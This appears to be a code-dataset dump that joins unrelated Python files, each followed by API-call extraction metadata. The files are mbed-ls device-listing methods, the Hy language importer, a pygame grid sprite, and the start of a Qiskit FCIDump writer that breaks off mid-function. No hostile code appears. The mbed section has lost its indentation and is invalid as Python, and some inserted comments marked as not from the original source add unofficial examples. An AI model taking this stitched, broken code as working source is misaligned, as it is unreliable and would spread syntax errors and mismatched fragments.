def mock_manufacture_id(self, mid, platform_name, oper='+'):
"""! Replace (or add if manufacture id doesn't exist) entry in self.manufacture_ids
@param oper '+' add new mock / override existing entry
'-' remove mid from mocking entry
@return Mocked structure (json format)
"""
        if oper == '+':
self.plat_db.add(mid, platform_name, permanent=True)
        elif oper == '-':
self.plat_db.remove(mid, permanent=True)
else:
raise ValueError("oper can only be [+-]")
@deprecated("List formatting methods are deprecated for a simpler API. "
"Please use 'list_mbeds' instead.")
def list_manufacture_ids(self):
"""! Creates list of all available mappings for target_id -> Platform
@return String with table formatted output
"""
from prettytable import PrettyTable, HEADER
columns = ['target_id_prefix', 'platform_name']
pt = PrettyTable(columns, junction_char="|", hrules=HEADER)
for col in columns:
pt.align[col] = 'l'
for target_id_prefix, platform_name in sorted(self.plat_db.items()):
pt.add_row([target_id_prefix, platform_name])
return pt.get_string()
def retarget_read(self):
"""! Load retarget data from local file
        @return Current retarget configuration (dictionary)
"""
if os.path.isfile(self.RETARGET_FILE_NAME):
logger.debug("reading retarget file %s", self.RETARGET_FILE_NAME)
try:
with open(self.RETARGET_FILE_NAME, "r", encoding="utf-8") as f:
return json.load(f)
except IOError as e:
logger.exception(e)
except ValueError as e:
logger.exception(e)
return {}
def retarget(self):
"""! Enable retargeting
@details Read data from local retarget configuration file
@return Retarget data structure read from configuration file
"""
self.retarget_data = self.retarget_read()
return self.retarget_data
def get_dummy_platform(self, platform_name):
"""! Returns simple dummy platform """
if not hasattr(self, "dummy_counter"):
self.dummy_counter = {} # platform<str>: counter<int>
if platform_name not in self.dummy_counter:
self.dummy_counter[platform_name] = 0
platform = {
"platform_name": platform_name,
"platform_name_unique": "%s[%d]"% (platform_name, self.dummy_counter[platform_name]),
"mount_point": "DUMMY",
"serial_port": "DUMMY",
"target_id": "DUMMY",
"target_id_mbed_htm": "DUMMY",
"target_id_usb_id": "DUMMY",
"daplink_version": "DUMMY"
}
self.dummy_counter[platform_name] += 1
return platform
def get_supported_platforms(self, device_type=None):
"""! Return a dictionary of supported target ids and the corresponding platform name
@param device_type Filter which device entries are returned from the platform database
@return Dictionary of { 'target_id': 'platform_name', ... }
"""
kwargs = {}
if device_type is not None:
kwargs['device_type'] = device_type
items = self.plat_db.items(**kwargs)
return {i[0]: i[1] for i in items}
@deprecated("List formatting methods are deprecated to simplify the API. "
"Please use 'list_mbeds' instead.")
def list_platforms(self):
"""! Useful if you just want to know which platforms are currently available on the system
@return List of (unique values) available platforms
"""
result = []
mbeds = self.list_mbeds()
for i, val in enumerate(mbeds):
platform_name = str(val['platform_name'])
if platform_name not in result:
result.append(platform_name)
return result
@deprecated("List formatting methods are deprecated to simplify the API. "
"Please use 'list_mbeds' instead.")
def list_platforms_ext(self):
"""! Useful if you just want to know how many platforms of each type are currently available on the system
@return Dict of platform: platform_count
"""
result = {}
mbeds = self.list_mbeds()
for i, val in enumerate(mbeds):
platform_name = str(val['platform_name'])
if platform_name not in result:
result[platform_name] = 1
else:
result[platform_name] += 1
return result
@deprecated("List formatting methods are deprecated to simplify the API. "
"Please use 'list_mbeds' instead.")
def list_mbeds_by_targetid(self):
"""! Get information about mbeds with extended parameters/info included
@return Returns dictionary where keys are TargetIDs and values are mbed structures
@details Ordered by target id (key: target_id).
"""
result = {}
mbed_list = self.list_mbeds_ext()
for mbed in mbed_list:
target_id = mbed['target_id']
result[target_id] = mbed
return result
def __str__(self):
"""! Object to string casting
        @return Stringified class object, formatted as a prettytable string
"""
return self.get_string()
@deprecated("List formatting methods are deprecated to simplify the API. "
"Please use 'list_mbeds' instead.")
def get_string(self, border=False, header=True, padding_width=1, sortby='platform_name'):
"""! Printing with some sql table like decorators
@param border Table border visibility
@param header Table header visibility
@param padding_width Table padding
@param sortby Column used to sort results
@return Returns string which can be printed on console
"""
from prettytable import PrettyTable, HEADER
result = ''
mbeds = self.list_mbeds(unique_names=True, read_details_txt=True)
if mbeds:
""" ['platform_name', 'mount_point', 'serial_port', 'target_id'] - columns generated from USB auto-detection
['platform_name_unique', ...] - columns generated outside detection subsystem (OS dependent detection)
"""
columns = ['platform_name', 'platform_name_unique', 'mount_point', 'serial_port', 'target_id', 'daplink_version']
pt = PrettyTable(columns, junction_char="|", hrules=HEADER)
for col in columns:
pt.align[col] = 'l'
for mbed in mbeds:
row = []
for col in columns:
row.append(mbed[col] if col in mbed and mbed[col] else 'unknown')
pt.add_row(row)
result = pt.get_string(border=border, header=header, padding_width=padding_width, sortby=sortby)
return result
# Private functions supporting API
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def get_json_data_from_file(self, json_spec_filename, verbose=False):
"""! Loads from file JSON formatted string to data structure
@return None if JSON can be loaded
"""
try:
with open(json_spec_filename) as data_file:
try:
return json.load(data_file)
except ValueError as json_error_msg:
logger.error("Parsing file(%s): %s", json_spec_filename, json_error_msg)
return None
except IOError as fileopen_error_msg:
logger.warning(fileopen_error_msg)
return None
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def get_htm_target_id(self, mount_point):
target_id, _ = self._read_htm_ids(mount_point)
return target_id
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def get_mbed_htm(self, mount_point):
_, build_info = self._read_htm_ids(mount_point)
return build_info
def _read_htm_ids(self, mount_point):
"""! Function scans mbed.htm to get information about TargetID.
@param mount_point mbed mount point (disk / drive letter)
@return Function returns targetID, in case of failure returns None.
@details Note: This function should be improved to scan variety of boards' mbed.htm files
"""
result = {}
target_id = None
for line in self._htm_lines(mount_point):
target_id = target_id or self._target_id_from_htm(line)
ver_bld = self._mbed_htm_comment_section_ver_build(line)
if ver_bld:
result['version'], result['build'] = ver_bld
m = re.search(r'url=([\w\d\:/\\\?\.=-_]+)', line)
if m:
result['url'] = m.group(1).strip()
return target_id, result
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def get_mbed_htm_comment_section_ver_build(self, line):
return self._mbed_htm_comment_section_ver_build(line)
def _mbed_htm_comment_section_ver_build(self, line):
"""! Check for Version and Build date of interface chip firmware im mbed.htm file
@return (version, build) tuple if successful, None if no info found
"""
# <!-- Version: 0200 Build: Mar 26 2014 13:22:20 -->
m = re.search(r'^<!-- Version: (\d+) Build: ([\d\w: ]+) -->', line)
if m:
version_str, build_str = m.groups()
return (version_str.strip(), build_str.strip())
# <!-- Version: 0219 Build: Feb 2 2016 15:20:54 Git Commit SHA: 0853ba0cdeae2436c52efcba0ba76a6434c200ff Git local mods:No-->
m = re.search(r'^<!-- Version: (\d+) Build: ([\d\w: ]+) Git Commit SHA', line)
if m:
version_str, build_str = m.groups()
return (version_str.strip(), build_str.strip())
# <!-- Version: 0.14.3. build 471 -->
m = re.search(r'^<!-- Version: ([\d+\.]+)\. build (\d+) -->', line)
if m:
version_str, build_str = m.groups()
return (version_str.strip(), build_str.strip())
return None
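    # Illustrative example (not in the original source): for the line
    #   '<!-- Version: 0200 Build: Mar 26 2014 13:22:20 -->'
    # the method above returns ('0200', 'Mar 26 2014 13:22:20'); unrelated lines yield None.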
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def get_mbed_htm_lines(self, mount_point):
return self._htm_lines(mount_point)
def _htm_lines(self, mount_point):
if mount_point:
mbed_htm_path = join(mount_point, self.MBED_HTM_NAME)
with open(mbed_htm_path, 'r') as f:
return f.readlines()
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def get_details_txt(self, mount_point):
return self._details_txt(mount_point)
def _details_txt(self, mount_point):
"""! Load DETAILS.TXT to dictionary:
DETAILS.TXT example:
Version: 0226
Build: Aug 24 2015 17:06:30
Git Commit SHA: 27a236b9fe39c674a703c5c89655fbd26b8e27e1
Git Local mods: Yes
or:
# DAPLink Firmware - see https://mbed.com/daplink
Unique ID: 0240000029164e45002f0012706e0006f301000097969900
HIF ID: 97969900
Auto Reset: 0
Automation allowed: 0
Daplink Mode: Interface
Interface Version: 0240
Git SHA: c765cbb590f57598756683254ca38b211693ae5e
Local Mods: 0
USB Interfaces: MSD, CDC, HID
Interface CRC: 0x26764ebf
"""
if mount_point:
path_to_details_txt = os.path.join(mount_point, self.DETAILS_TXT_NAME)
with open(path_to_details_txt, 'r') as f:
return self._parse_details(f.readlines())
return None
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def parse_details_txt(self, lines):
return self._parse_details(lines)
def _parse_details(self, lines):
result = {}
for line in lines:
if not line.startswith('#'):
key, _, value = line.partition(':')
if value:
result[key] = value.strip()
if 'Interface Version' in result:
result['Version'] = result['Interface Version']
return result
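    # Illustrative example (not in the original source):
    #   _parse_details(["Version: 0226\n", "Build: Aug 24 2015 17:06:30\n"])
    # returns {'Version': '0226', 'Build': 'Aug 24 2015 17:06:30'}; lines starting with '#' are skipped.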
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def scan_html_line_for_target_id(self, line):
return self._target_id_from_htm(line)
def _target_id_from_htm(self, line):
"""! Extract Target id from htm line.
@return Target id or None
"""
# Detecting modern mbed.htm file format
m = re.search('\?code=([a-fA-F0-9]+)', line)
if m:
result = m.groups()[0]
logger.debug("Found target id %s in htm line %s", result, line)
return result
# Last resort, we can try to see if old mbed.htm format is there
m = re.search('\?auth=([a-fA-F0-9]+)', line)
if m:
result = m.groups()[0]
logger.debug("Found target id %s in htm line %s", result, line)
return result
return None
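    # Illustrative example (not in the original source): a line containing
    # 'mbed.org/device/?code=0240AABBCCDD' yields '0240AABBCCDD'; legacy pages that
    # use '?auth=...' instead of '?code=...' are handled by the second pattern.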
def mount_point_ready(self, path):
"""! Check if a mount point is ready for file operations
"""
return exists(path) and isdir(path)
@staticmethod
@deprecated("This method will be removed from the public API. "
"Please use 'list_mbeds' instead")
def run_cli_process(cmd, shell=True):
return MbedLsToolsBase._run_cli_process(cmd, shell)
@staticmethod
def _run_cli_process(cmd, shell=True):
"""! Runs command as a process and return stdout, stderr and ret code
@param cmd Command to execute
@return Tuple of (stdout, stderr, returncode)
"""
from subprocess import Popen, PIPE
p = Popen(cmd, shell=shell, stdout=PIPE, stderr=PIPE)
_stdout, _stderr = p.communicate()
return _stdout, _stderr, p.returncode
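# --- Hedged usage sketch (not part of the original module) -------------------
# MbedLsToolsBase is abstract; each host OS backend only has to supply
# find_candidates().  The values below are placeholders chosen for illustration
# (a DAPLink-style vendor id and a fake target id), not real device data.
class _ExampleLsTools(MbedLsToolsBase):
    """Toy backend returning one fake, unmounted candidate device."""
    def find_candidates(self):
        return [{
            'mount_point': None,
            'serial_port': None,
            'target_id_usb_id': '0240000000000000000000000000000000000000',
            'vendor_id': '0d28',
        }]
# Typical interactive use:
#   _ExampleLsTools(list_unmounted=True).list_mbeds()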
| [
"logging.getLogger",
"logging.NullHandler",
"prettytable.PrettyTable",
"os.listdir",
"os.path.exists",
"subprocess.Popen",
"os.path.join",
"functools.wraps",
"io.open",
"os.path.isfile",
"os.path.isdir",
"json.load",
"os.path.expanduser",
"re.search"
] | [((939, 966), 'logging.getLogger', 'logging.getLogger', (['"""mbedls"""'], {}), "('mbedls')\n", (956, 966), False, 'import logging\n'), ((1022, 1062), 'logging.getLogger', 'logging.getLogger', (['"""mbedls.lstools_base"""'], {}), "('mbedls.lstools_base')\n", (1039, 1062), False, 'import logging\n'), ((1081, 1102), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (1100, 1102), False, 'import logging\n'), ((1996, 2011), 'os.path.expanduser', 'expanduser', (['"""~"""'], {}), "('~')\n", (2006, 2011), False, 'from os.path import expanduser\n'), ((1225, 1246), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (1240, 1246), False, 'import functools\n'), ((13014, 13081), 'os.path.join', 'os.path.join', (["device['mount_point']", 'lower_case_map[board_file_key]'], {}), "(device['mount_point'], lower_case_map[board_file_key])\n", (13026, 13081), False, 'import os\n'), ((16840, 16894), 'prettytable.PrettyTable', 'PrettyTable', (['columns'], {'junction_char': '"""|"""', 'hrules': 'HEADER'}), "(columns, junction_char='|', hrules=HEADER)\n", (16851, 16894), False, 'from prettytable import PrettyTable, HEADER\n'), ((17283, 17322), 'os.path.isfile', 'os.path.isfile', (['self.RETARGET_FILE_NAME'], {}), '(self.RETARGET_FILE_NAME)\n', (17297, 17322), False, 'import os\n'), ((25585, 25650), 're.search', 're.search', (['"""^<!-- Version: (\\\\d+) Build: ([\\\\d\\\\w: ]+) -->"""', 'line'], {}), "('^<!-- Version: (\\\\d+) Build: ([\\\\d\\\\w: ]+) -->', line)\n", (25594, 25650), False, 'import re\n'), ((25919, 25995), 're.search', 're.search', (['"""^<!-- Version: (\\\\d+) Build: ([\\\\d\\\\w: ]+) Git Commit SHA"""', 'line'], {}), "('^<!-- Version: (\\\\d+) Build: ([\\\\d\\\\w: ]+) Git Commit SHA', line)\n", (25928, 25995), False, 'import re\n'), ((26175, 26241), 're.search', 're.search', (['"""^<!-- Version: ([\\\\d+\\\\.]+)\\\\. build (\\\\d+) -->"""', 'line'], {}), "('^<!-- Version: ([\\\\d+\\\\.]+)\\\\. 
build (\\\\d+) -->', line)\n", (26184, 26241), False, 'import re\n'), ((29027, 29068), 're.search', 're.search', (['"""\\\\?code=([a-fA-F0-9]+)"""', 'line'], {}), "('\\\\?code=([a-fA-F0-9]+)', line)\n", (29036, 29068), False, 'import re\n'), ((29304, 29345), 're.search', 're.search', (['"""\\\\?auth=([a-fA-F0-9]+)"""', 'line'], {}), "('\\\\?auth=([a-fA-F0-9]+)', line)\n", (29313, 29345), False, 'import re\n'), ((30218, 30267), 'subprocess.Popen', 'Popen', (['cmd'], {'shell': 'shell', 'stdout': 'PIPE', 'stderr': 'PIPE'}), '(cmd, shell=shell, stdout=PIPE, stderr=PIPE)\n', (30223, 30267), False, 'from subprocess import Popen, PIPE\n'), ((2515, 2542), 'os.path.isfile', 'isfile', (['self.MOCK_FILE_NAME'], {}), '(self.MOCK_FILE_NAME)\n', (2521, 2542), False, 'from os.path import isfile, join, exists, isdir\n'), ((2663, 2691), 'os.path.isfile', 'isfile', (['LOCAL_MOCKS_DATABASE'], {}), '(LOCAL_MOCKS_DATABASE)\n', (2669, 2691), False, 'from os.path import isfile, join, exists, isdir\n'), ((9283, 9316), 'os.listdir', 'os.listdir', (["device['mount_point']"], {}), "(device['mount_point'])\n", (9293, 9316), False, 'import os\n'), ((13095, 13121), 'io.open', 'open', (['board_file_path', '"""r"""'], {}), "(board_file_path, 'r')\n", (13099, 13121), False, 'from io import open\n'), ((13246, 13300), 're.search', 're.search', (['"""url=([\\\\w\\\\d\\\\:\\\\-/\\\\\\\\\\\\?\\\\.=-_]+)"""', 'line'], {}), "('url=([\\\\w\\\\d\\\\:\\\\-/\\\\\\\\\\\\?\\\\.=-_]+)', line)\n", (13255, 13300), False, 'import re\n'), ((22440, 22494), 'prettytable.PrettyTable', 'PrettyTable', (['columns'], {'junction_char': '"""|"""', 'hrules': 'HEADER'}), "(columns, junction_char='|', hrules=HEADER)\n", (22451, 22494), False, 'from prettytable import PrettyTable, HEADER\n'), ((24886, 24937), 're.search', 're.search', (['"""url=([\\\\w\\\\d\\\\:/\\\\\\\\\\\\?\\\\.=-_]+)"""', 'line'], {}), "('url=([\\\\w\\\\d\\\\:/\\\\\\\\\\\\?\\\\.=-_]+)', line)\n", (24895, 24937), False, 'import re\n'), ((26684, 26721), 'os.path.join', 'join', (['mount_point', 'self.MBED_HTM_NAME'], {}), '(mount_point, self.MBED_HTM_NAME)\n', (26688, 26721), False, 'from os.path import isfile, join, exists, isdir\n'), ((27858, 27906), 'os.path.join', 'os.path.join', (['mount_point', 'self.DETAILS_TXT_NAME'], {}), '(mount_point, self.DETAILS_TXT_NAME)\n', (27870, 27906), False, 'import os\n'), ((29649, 29661), 'os.path.exists', 'exists', (['path'], {}), '(path)\n', (29655, 29661), False, 'from os.path import isfile, join, exists, isdir\n'), ((29666, 29677), 'os.path.isdir', 'isdir', (['path'], {}), '(path)\n', (29671, 29677), False, 'from os.path import isfile, join, exists, isdir\n'), ((23293, 23317), 'io.open', 'open', (['json_spec_filename'], {}), '(json_spec_filename)\n', (23297, 23317), False, 'from io import open\n'), ((26739, 26763), 'io.open', 'open', (['mbed_htm_path', '"""r"""'], {}), "(mbed_htm_path, 'r')\n", (26743, 26763), False, 'from io import open\n'), ((27924, 27954), 'io.open', 'open', (['path_to_details_txt', '"""r"""'], {}), "(path_to_details_txt, 'r')\n", (27928, 27954), False, 'from io import open\n'), ((17440, 17492), 'io.open', 'open', (['self.RETARGET_FILE_NAME', '"""r"""'], {'encoding': '"""utf-8"""'}), "(self.RETARGET_FILE_NAME, 'r', encoding='utf-8')\n", (17444, 17492), False, 'from io import open\n'), ((17526, 17538), 'json.load', 'json.load', (['f'], {}), '(f)\n', (17535, 17538), False, 'import json\n'), ((23380, 23400), 'json.load', 'json.load', (['data_file'], {}), '(data_file)\n', (23389, 23400), False, 'import json\n')] |
# Copyright (c) 2013 <NAME> <<EMAIL>>
# Copyright (c) 2013, 2014 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from hy.compiler import hy_compile, HyTypeError
from hy.models import HyObject, replace_hy_obj
from hy.lex import tokenize, LexException
from hy.errors import HyIOError
from io import open
import marshal
import imp
import sys
import ast
import os
import __future__
from hy._compat import PY3, PY33, MAGIC, builtins, long_type, wr_long
def ast_compile(ast, filename, mode):
"""Compile AST.
Like Python's compile, but with some special flags."""
flags = (__future__.CO_FUTURE_DIVISION |
__future__.CO_FUTURE_PRINT_FUNCTION)
return compile(ast, filename, mode, flags)
def import_buffer_to_hst(buf):
"""Import content from buf and return an Hy AST."""
return tokenize(buf + "\n")
def import_file_to_hst(fpath):
"""Import content from fpath and return an Hy AST."""
try:
with open(fpath, 'r', encoding='utf-8') as f:
return import_buffer_to_hst(f.read())
except IOError as e:
raise HyIOError(e.errno, e.strerror, e.filename)
def import_buffer_to_ast(buf, module_name):
""" Import content from buf and return a Python AST."""
return hy_compile(import_buffer_to_hst(buf), module_name)
def import_file_to_ast(fpath, module_name):
"""Import content from fpath and return a Python AST."""
return hy_compile(import_file_to_hst(fpath), module_name)
def import_file_to_module(module_name, fpath):
"""Import content from fpath and puts it into a Python module.
Returns the module."""
try:
_ast = import_file_to_ast(fpath, module_name)
mod = imp.new_module(module_name)
mod.__file__ = fpath
eval(ast_compile(_ast, fpath, "exec"), mod.__dict__)
except (HyTypeError, LexException) as e:
if e.source is None:
with open(fpath, 'rt') as fp:
e.source = fp.read()
e.filename = fpath
raise
except Exception:
sys.modules.pop(module_name, None)
raise
return mod
def import_buffer_to_module(module_name, buf):
try:
_ast = import_buffer_to_ast(buf, module_name)
mod = imp.new_module(module_name)
eval(ast_compile(_ast, "", "exec"), mod.__dict__)
except (HyTypeError, LexException) as e:
if e.source is None:
e.source = buf
e.filename = '<stdin>'
raise
return mod
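# Illustrative example (not part of the original module); the Hy source and the
# module/function names below are assumptions made only for demonstration:
#   mod = import_buffer_to_module("demo", "(defn double [x] (* 2 x))")
#   mod.double(21)   # => 42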
def hy_eval(hytree, namespace, module_name):
foo = HyObject()
foo.start_line = 0
foo.end_line = 0
foo.start_column = 0
foo.end_column = 0
replace_hy_obj(hytree, foo)
_ast, expr = hy_compile(hytree, module_name, get_expr=True)
# Spoof the positions in the generated ast...
for node in ast.walk(_ast):
node.lineno = 1
node.col_offset = 1
for node in ast.walk(expr):
node.lineno = 1
node.col_offset = 1
# Two-step eval: eval() the body of the exec call
eval(ast_compile(_ast, "<eval_body>", "exec"), namespace)
# Then eval the expression context and return that
return eval(ast_compile(expr, "<eval>", "eval"), namespace)
def write_hy_as_pyc(fname):
with open(fname, 'U') as f:
try:
st = os.fstat(f.fileno())
except AttributeError:
st = os.stat(fname)
timestamp = long_type(st.st_mtime)
_ast = import_file_to_ast(fname,
os.path.basename(os.path.splitext(fname)[0]))
code = ast_compile(_ast, fname, "exec")
cfile = "%s.pyc" % fname[:-len(".hy")]
open_ = builtins.open
with open_(cfile, 'wb') as fc:
if PY3:
fc.write(b'\0\0\0\0')
else:
fc.write('\0\0\0\0')
wr_long(fc, timestamp)
if PY33:
wr_long(fc, st.st_size)
marshal.dump(code, fc)
fc.flush()
fc.seek(0, 0)
fc.write(MAGIC)
class MetaLoader(object):
def __init__(self, path):
self.path = path
def is_package(self, fullname):
dirpath = "/".join(fullname.split("."))
for pth in sys.path:
pth = os.path.abspath(pth)
composed_path = "%s/%s/__init__.hy" % (pth, dirpath)
if os.path.exists(composed_path):
return True
return False
def load_module(self, fullname):
if fullname in sys.modules:
return sys.modules[fullname]
if not self.path:
return
sys.modules[fullname] = None
mod = import_file_to_module(fullname,
self.path)
ispkg = self.is_package(fullname)
mod.__file__ = self.path
mod.__loader__ = self
mod.__name__ = fullname
if ispkg:
mod.__path__ = []
mod.__package__ = fullname
else:
mod.__package__ = fullname.rpartition('.')[0]
sys.modules[fullname] = mod
return mod
class MetaImporter(object):
def find_on_path(self, fullname):
fls = ["%s/__init__.hy", "%s.hy"]
dirpath = "/".join(fullname.split("."))
for pth in sys.path:
pth = os.path.abspath(pth)
for fp in fls:
composed_path = fp % ("%s/%s" % (pth, dirpath))
if os.path.exists(composed_path):
return composed_path
def find_module(self, fullname, path=None):
path = self.find_on_path(fullname)
if path:
return MetaLoader(path)
sys.meta_path.insert(0, MetaImporter())
sys.path.insert(0, "")
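# Illustrative note (not in the original source): with MetaImporter registered on
# sys.meta_path and "" prepended to sys.path, a file such as ./greetings.hy in the
# current directory can be imported like any Python module:
#   import greetings   # compiled via import_file_to_module("greetings", "./greetings.hy")
# The module name 'greetings' is only an assumed example.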
| [
"os.path.exists",
"sys.path.insert",
"ast.walk",
"hy._compat.wr_long",
"hy.errors.HyIOError",
"marshal.dump",
"os.path.splitext",
"io.open",
"hy.lex.tokenize",
"hy.compiler.hy_compile",
"hy.models.HyObject",
"hy.models.replace_hy_obj",
"os.path.abspath",
"os.stat",
"hy._compat.long_type"... | [((6603, 6625), 'sys.path.insert', 'sys.path.insert', (['(0)', '""""""'], {}), "(0, '')\n", (6618, 6625), False, 'import sys\n'), ((1839, 1859), 'hy.lex.tokenize', 'tokenize', (["(buf + '\\n')"], {}), "(buf + '\\n')\n", (1847, 1859), False, 'from hy.lex import tokenize, LexException\n'), ((3548, 3558), 'hy.models.HyObject', 'HyObject', ([], {}), '()\n', (3556, 3558), False, 'from hy.models import HyObject, replace_hy_obj\n'), ((3655, 3682), 'hy.models.replace_hy_obj', 'replace_hy_obj', (['hytree', 'foo'], {}), '(hytree, foo)\n', (3669, 3682), False, 'from hy.models import HyObject, replace_hy_obj\n'), ((3700, 3746), 'hy.compiler.hy_compile', 'hy_compile', (['hytree', 'module_name'], {'get_expr': '(True)'}), '(hytree, module_name, get_expr=True)\n', (3710, 3746), False, 'from hy.compiler import hy_compile, HyTypeError\n'), ((3814, 3828), 'ast.walk', 'ast.walk', (['_ast'], {}), '(_ast)\n', (3822, 3828), False, 'import ast\n'), ((3899, 3913), 'ast.walk', 'ast.walk', (['expr'], {}), '(expr)\n', (3907, 3913), False, 'import ast\n'), ((2704, 2731), 'imp.new_module', 'imp.new_module', (['module_name'], {}), '(module_name)\n', (2718, 2731), False, 'import imp\n'), ((3240, 3267), 'imp.new_module', 'imp.new_module', (['module_name'], {}), '(module_name)\n', (3254, 3267), False, 'import imp\n'), ((4243, 4259), 'io.open', 'open', (['fname', '"""U"""'], {}), "(fname, 'U')\n", (4247, 4259), False, 'from io import open\n'), ((4400, 4422), 'hy._compat.long_type', 'long_type', (['st.st_mtime'], {}), '(st.st_mtime)\n', (4409, 4422), False, 'from hy._compat import PY3, PY33, MAGIC, builtins, long_type, wr_long\n'), ((4792, 4814), 'hy._compat.wr_long', 'wr_long', (['fc', 'timestamp'], {}), '(fc, timestamp)\n', (4799, 4814), False, 'from hy._compat import PY3, PY33, MAGIC, builtins, long_type, wr_long\n'), ((4876, 4898), 'marshal.dump', 'marshal.dump', (['code', 'fc'], {}), '(code, fc)\n', (4888, 4898), False, 'import marshal\n'), ((1973, 2007), 'io.open', 'open', (['fpath', '"""r"""'], {'encoding': '"""utf-8"""'}), "(fpath, 'r', encoding='utf-8')\n", (1977, 2007), False, 'from io import open\n'), ((2103, 2145), 'hy.errors.HyIOError', 'HyIOError', (['e.errno', 'e.strerror', 'e.filename'], {}), '(e.errno, e.strerror, e.filename)\n', (2112, 2145), False, 'from hy.errors import HyIOError\n'), ((3050, 3084), 'sys.modules.pop', 'sys.modules.pop', (['module_name', 'None'], {}), '(module_name, None)\n', (3065, 3084), False, 'import sys\n'), ((4844, 4867), 'hy._compat.wr_long', 'wr_long', (['fc', 'st.st_size'], {}), '(fc, st.st_size)\n', (4851, 4867), False, 'from hy._compat import PY3, PY33, MAGIC, builtins, long_type, wr_long\n'), ((5179, 5199), 'os.path.abspath', 'os.path.abspath', (['pth'], {}), '(pth)\n', (5194, 5199), False, 'import os\n'), ((5280, 5309), 'os.path.exists', 'os.path.exists', (['composed_path'], {}), '(composed_path)\n', (5294, 5309), False, 'import os\n'), ((6213, 6233), 'os.path.abspath', 'os.path.abspath', (['pth'], {}), '(pth)\n', (6228, 6233), False, 'import os\n'), ((4365, 4379), 'os.stat', 'os.stat', (['fname'], {}), '(fname)\n', (4372, 4379), False, 'import os\n'), ((4508, 4531), 'os.path.splitext', 'os.path.splitext', (['fname'], {}), '(fname)\n', (4524, 4531), False, 'import os\n'), ((6344, 6373), 'os.path.exists', 'os.path.exists', (['composed_path'], {}), '(composed_path)\n', (6358, 6373), False, 'import os\n'), ((2913, 2930), 'io.open', 'open', (['fpath', '"""rt"""'], {}), "(fpath, 'rt')\n", (2917, 2930), False, 'from io import open\n')] |
import pygame as pg
class State(pg.sprite.Sprite):
def __init__(self,col,row):
super().__init__()
self.image=pg.Surface((50,50))
self.rect=self.image.get_rect()
self.pos=pg.Vector2(col,row)
self.set_pixcel_position()
def set_pixcel_position(self):
self.rect.x=self.pos.x*50
self.rect.y=self.pos.y*50
def change_with_policy(self,state_dict,policy): #policy={0:'up',1:'down'} etc
state=state_dict[(self.pos.x,self.pos.y)]['state']
optimal_action=policy[state]
self.image=pg.transform.scale(pg.image.load('./images/'+optimal_action+'.png'),(20,20))
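# Minimal usage sketch (not part of the original file).  The 50-pixel grid size
# comes from the class above; everything else here is an assumption for
# illustration.  change_with_policy() additionally expects ./images/<action>.png
# files (e.g. ./images/up.png) to exist.
if __name__ == "__main__":
    pg.init()
    s = State(col=2, row=3)
    print(s.rect.topleft)  # -> (100, 150), because every grid cell is 50x50 pixels
    pg.quit()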
| [
"pygame.image.load",
"pygame.Vector2",
"pygame.Surface"
] | [((130, 150), 'pygame.Surface', 'pg.Surface', (['(50, 50)'], {}), '((50, 50))\n', (140, 150), True, 'import pygame as pg\n'), ((207, 227), 'pygame.Vector2', 'pg.Vector2', (['col', 'row'], {}), '(col, row)\n', (217, 227), True, 'import pygame as pg\n'), ((599, 651), 'pygame.image.load', 'pg.image.load', (["('./images/' + optimal_action + '.png')"], {}), "('./images/' + optimal_action + '.png')\n", (612, 651), True, 'import pygame as pg\n')] |
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""FCIDump dumper."""
from typing import List, Optional
from io import TextIOWrapper
import itertools
import numpy as np
def dump(outpath: str, norb: int, nelec: int, hijs: List[float], hijkls: List[float], einact: float,
ms2: int = 0, orbsym: Optional[List[int]] = None, isym: int = 1
) -> None:
# pylint: disable=wrong-spelling-in-docstring
"""Generates a FCIDump output.
Args:
outpath: Path to the output file.
norb: The number of orbitals.
nelec: The number of electrons.
hijs: The pair of alpha and beta 1-electron integrals. The latter may be None.
hijkls: The triplet of alpha/alpha, beta/alpha and beta/beta 2-electron integrals. The
latter two may be None.
einact: The inactive energy.
ms2: 2*S, where S is the spin quantum number.
orbsym: A list of spatial symmetries of the orbitals.
isym: The spatial symmetry of the wave function.
"""
hij, hij_b = hijs
hijkl, hijkl_ba, hijkl_bb = hijkls
# assert that either all beta variables are None or all of them are not
assert all([h is None for h in [hij_b, hijkl_ba, hijkl_bb]]) \
or all([h is not None for h in [hij_b, hijkl_ba, hijkl_bb]])
assert norb == hij.shape[0] == hijkl.shape[0]
mos = range(norb)
with open(outpath, 'w') as outfile:
# print header
outfile.write('&FCI NORB={:4d},NELEC={:4d},MS2={:4d}\n'.format(norb, nelec, ms2))
if orbsym is None:
outfile.write(' ORBSYM=' + '1,'*norb + '\n')
else:
assert len(orbsym) == norb
